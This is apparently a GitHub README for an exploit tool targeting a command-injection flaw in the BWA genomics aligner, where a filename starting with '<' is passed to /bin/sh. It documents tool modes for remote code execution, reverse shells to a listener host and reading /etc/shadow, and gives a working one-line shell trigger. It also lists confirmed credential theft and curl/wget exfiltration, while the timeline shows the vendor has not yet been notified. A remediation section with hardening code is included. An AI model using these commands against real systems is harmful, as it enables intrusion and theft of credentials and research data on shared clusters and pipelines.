jabir-dev/CVE-2026-BWA-RCE
# CVE-2026-XXXXX: BWA Command Injection (RCE)
## Overview
| Field | Value |
|-------|-------|
| **Product** | BWA (Burrows-Wheeler Aligner) |
| **Vendor** | lh3 (Heng Li) |
| **Versions** | 0 through 0.7.19 (all versions) |
| **Type** | OS Command Injection (CWE-78) |
| **CVSS 4.0** | 10.0 Critical |
| **Impact** | Remote Code Execution |
| **bio.tools** | https://bio.tools/bwa |
## Vulnerability
BWA's `kopen()` function in `kopen.c` (lines 286-309) accepts filenames starting with `<` and passes the remainder directly to `/bin/sh -c` for shell execution **without any input sanitization**.
```c
// kopen.c:309
execl("/bin/sh", "sh", "-c", p + 1, NULL); // p+1 = user-controlled input
```
## Impact
An attacker controlling filename arguments to BWA can achieve:
- **Arbitrary command execution** as the BWA process user
- **Credential theft** (environment variables, SSH keys, cloud tokens)
- **Arbitrary file read/write/delete**
- **Reverse shell** for persistent access
- **Data exfiltration** of genomic and system data
## Attack Surfaces
1. **Galaxy Project** workflows with user-uploaded sample names
2. **Nextflow/Snakemake** pipelines with untrusted FASTQ paths
3. **Shared HPC clusters** (university/research environments)
4. **Web-based bioinformatics tools** wrapping BWA
5. **CI/CD genomics pipelines** processing external data
## Usage
```bash
# Check if target BWA is vulnerable
python3 exploit.py --ref reference.fa --mode check
# Execute arbitrary command
python3 exploit.py --ref reference.fa --mode rce --cmd "id"
# Generate reverse shell payloads
python3 exploit.py --ref reference.fa --mode revshell --lhost 10.0.0.1 --lport 4444
# Read sensitive files
python3 exploit.py --ref reference.fa --mode exfil --files /etc/passwd /etc/shadow
```
### Quick Manual Test
```bash
# Create reference
echo ">s1" > ref.fa && echo "ACGTACGTACGT" >> ref.fa
bwa index ref.fa
# Trigger RCE
bwa mem ref.fa "< id > /tmp/pwned.txt; echo ACGT; #"
cat /tmp/pwned.txt
```
## Exploitation Results
| Test | Status |
|------|--------|
| Arbitrary command execution | **CONFIRMED** |
| Environment variable theft | **CONFIRMED** |
| Arbitrary file read (/etc/passwd) | **CONFIRMED** |
| SSH key enumeration | **CONFIRMED** |
| Crontab access | **CONFIRMED** |
| Reverse shell tools detected | **CONFIRMED** |
| Data exfiltration (curl/wget) | **CONFIRMED** |
## Root Cause
```c
// kopen.c:282-309
const char *p, *q;
for (p = fn; *p; ++p)
    if (!isspace(*p)) break;
if (*p == '<') { // filename starts with '<'
    // ...
    for (q = p + 1; *q; ++q)
        if (ispunct(*q) && *q != '.' && *q != '_' && *q != '-' && *q != ':')
            break;
    need_shell = (*q != 0); // weak heuristic check
    // ...
    if (!need_shell) {
        argv = cmd2argv(p + 1);
        execvp(argv[0], argv); // direct exec
    } else
        execl("/bin/sh", "sh", "-c", p + 1, NULL); // SHELL INJECTION!
}
```
## Remediation
1. **Remove** the `<` pipe feature entirely, OR
2. **Require** an explicit flag (`--enable-pipe`) to activate it, OR
3. **Sanitize** input by rejecting shell metacharacters in filenames
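As an added example (not BWA's own code and not part of this repository), a filename classifier that combines options 2 and 3: the `<` pipe feature is only considered when the caller passes an operator-set `allow_pipe` flag (modelling the proposed `--enable-pipe`, which does not exist in BWA), and even then any character outside a small allowlist causes rejection instead of a fallback to `/bin/sh -c`.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>

/* Hardening example: classify a filename argument before it reaches
 * kopen()-style handling.  The vulnerable code treats a leading '<' as
 * "run the rest as a command" and hands it to /bin/sh -c whenever its
 * punctuation heuristic trips, which is the injection point. */
typedef enum { FN_PLAIN = 0, FN_PIPE_OK = 1, FN_REJECT = 2 } fn_class_t;

/* Characters permitted inside a pipe command: argv words, option dashes,
 * paths, and whitespace separators.  Shell metacharacters such as
 * ; | & $ ` > < ( ) " ' \ and newline are never on this list. */
static bool pipe_char_ok(unsigned char c) {
    return isalnum(c) || c == ' ' || c == '.' || c == '_' || c == '-' ||
           c == '/' || c == ':' || c == '=';
}

/* allow_pipe is an assumption standing in for a --enable-pipe flag set by
 * the operator on the command line, never derived from the input itself.
 * Note that FN_PIPE_OK still means "a program named by the argument will
 * be run via execvp", so the flag, not the allowlist, is what keeps the
 * feature off in pipelines that process untrusted sample names. */
fn_class_t classify_filename(const char *fn, bool allow_pipe) {
    const char *p = fn;
    while (*p && isspace((unsigned char)*p)) ++p;   /* same skip as kopen() */
    if (*p != '<')
        return FN_PLAIN;        /* ordinary path: open it, never exec anything */
    if (!allow_pipe)
        return FN_REJECT;       /* feature disabled: refuse, do not fall back */
    for (const char *q = p + 1; *q; ++q)
        if (!pipe_char_ok((unsigned char)*q))
            return FN_REJECT;   /* metacharacter present: refuse outright */
    return FN_PIPE_OK;          /* safe to tokenize and pass to execvp() only */
}
```

A caller that receives `FN_REJECT` should fail the open with an error rather than retrying through a shell, since the retry is exactly the path the heuristic in `kopen()` takes today.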
## Timeline
| Date | Event |
|------|-------|
| 2026-05-30 | Vulnerability discovered |
| 2026-05-30 | CVE requested from MITRE (CAN-2026-2030800) |
| TBD | CVE ID assigned |
| TBD | Vendor notification |
| TBD | Public disclosure (90 days after vendor notification) |
## Disclaimer
This exploit is provided for **authorized security testing** and **educational purposes** only. Only use on systems you have explicit permission to test. The author is not responsible for any misuse of this tool.
## License
MIT